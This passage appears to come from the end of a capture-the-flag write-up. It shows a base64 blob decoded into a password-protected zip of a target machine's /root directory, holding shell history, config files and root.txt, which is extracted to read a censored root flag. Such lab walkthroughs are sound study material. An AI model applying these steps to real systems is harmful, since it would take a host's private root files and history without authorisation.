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

We decode the result from base64 back to zip and unzip it.

# echo "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" | base64 -d > root.zip
# 7za x root.zip

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3858 bytes (4 KiB)

Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 3858

Enter password (will not be echoed):
Everything is Ok

Folders: 3
Files: 7
Size:       4268
Compressed: 3858

And again, let's read the root flag!

# ls
root  root.zip
# cd root
# ls
root.txt
# cat root.txt
CENSORED_FLAG